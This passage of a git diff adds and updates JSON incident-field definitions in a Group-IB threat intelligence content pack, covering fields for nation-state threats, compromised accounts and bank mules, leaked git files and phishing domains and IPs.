"incident_gibnationstatecybercriminalsthreatreportnumber", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Report Number", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json new file mode 100644 index 000000000000..6170f6243983 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreatsectors", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreatsectors", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Sectors", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json new file mode 100644 index 000000000000..eb4f2bc7d8dc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "caseInsensitive": true, + "cliName": "gibnationstatecybercriminalsthreattitle", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibnationstatecybercriminalsthreattitle", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Nation-State Cybercriminals Threat Title", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Nation-State Cybercriminals Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json new file mode 100644 index 000000000000..8d7c69d2b5ac --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json @@ -0,0 +1,158 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Git Leak" + ], + "caseInsensitive": true, + "cliName": "gibosigitrepositoryfilestable", + "closeForm": true, + "columns": [ + { + "displayName": "File ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "fileid", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "File Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "filename", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Hash", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "hash", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Created", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datecreated", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Date Detected", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datedetected", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Author Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "authorname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Author Email", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "authoremail", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Url", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Data Found", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datafound", + "orgType": "longText", + "required": false, + "script": "", + "selectValues": [], + "type": "longText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibosigitrepositoryfilestable", + "isReadOnly": false, + "locked": false, + "name": "GIB OSI Git Repository Files Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Git Leak" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json new file mode 100644 index 000000000000..ccbabd052f00 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationbic", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationbic", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization BIC", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json new file mode 100644 index 000000000000..dfcbb1f0291e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationbsb", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationbsb", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization BSB", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json new file mode 100644 index 000000000000..1c9e5d335c74 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationclabe", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationclabe", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization CLABE", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json new file mode 100644 index 000000000000..ed007bfe6db5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationiban", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationiban", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization IBAN", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json new file mode 100644 index 000000000000..9fbd5f2a1b78 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json new file mode 100644 index 000000000000..72a9b95a9ca6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "giborganizationswift", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_giborganizationswift", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Organization SWIFT", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json new file mode 100644 index 000000000000..7a68d30931ee --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibparsedlogindomain", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibparsedlogindomain", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Parsed Login Domain", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json new file mode 100644 index 000000000000..c4d935893ca4 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "caseInsensitive": true, + "cliName": "gibparsedloginip", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibparsedloginip", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Parsed Login IP", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Account Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json index 39291d0ec7d0..f514f2a7c572 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Password.json @@ -2,7 +2,8 @@ "associatedToAll": false, "associatedTypes": [ "GIB Compromised Account", - "GIB Data Breach" + "GIB Data Breach", + "GIB Compromised Account Group" ], "caseInsensitive": false, "cliName": "gibpassword", @@ -26,5 +27,12 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Data Breach", + "GIB Compromised Account Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json new file mode 100644 index 000000000000..75dc21852741 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibpasswords", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibpasswords", + "isReadOnly": false, + "locked": false, + "name": "GIB Passwords", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json index 9a5c580b1421..bfcd258fea78 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Payment_System.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Compromised Card" + "GIB Compromised Card", + "GIB Compromised Card Group" ], "caseInsensitive": false, "cliName": "gibpaymentsystem", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Card", + "GIB Compromised Card Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json index 26298fdc55b1..9fb22bb81a6d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Person.json @@ -27,5 +27,12 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Compromised Account", + "GIB Compromised Card" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json new file mode 100644 index 000000000000..f373e6113609 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingbrand", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingbrand", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Brand", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json new file mode 100644 index 000000000000..992c11a32755 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdateadded", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdateadded", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Date Added", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json index 37941a7999dd..3c9573d6cba1 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Blocked.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Phishing" + "GIB Brand Protection Phishing", + "GIB Attacks Phishing Group" ], "caseInsensitive": true, "cliName": "gibphishingdateblocked", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Attacks Phishing Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json new file mode 100644 index 000000000000..9ba127c8e03f --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdatedetected", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdatedetected", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Date Detected", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json new file mode 100644 index 000000000000..8fbeb1b9f95c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json @@ -0,0 +1,35 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdateupdated", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "gibphishingdateupdated", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Date Updated", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "5.0.0", + "toVersion": "99.99.99" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json index f1df81d0db83..431b589c6e30 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Brand Protection Domain" + "GIB Brand Protection Domain", + "GIB Attacks Phishing Group" ], "caseInsensitive": true, "cliName": "gibphishingdomain", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" -} + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Attacks Phishing Group" + ] +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json new file mode 100644 index 000000000000..a6647bfc6f12 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdomainexpirationdate", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdomainexpirationdate", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Domain Expiration Date", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json new file mode 100644 index 000000000000..ead822043591 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json @@ -0,0 +1,37 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingdomainpuny", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingdomainpuny", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing Domain Puny", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json new file mode 100644 index 000000000000..170b9219148b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json @@ -0,0 +1,94 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Group" + ], + "caseInsensitive": true, + "cliName": "gibphishingiptable", + "closeForm": true, + "columns": [ + { + "displayName": "IP", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "ip", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Country Code", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "countrycode", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Country Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "countryname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Provider", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "provider", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibphishingiptable", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Phishing IP Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Group" + ], + "threshold": 72, + "type": "grid", + 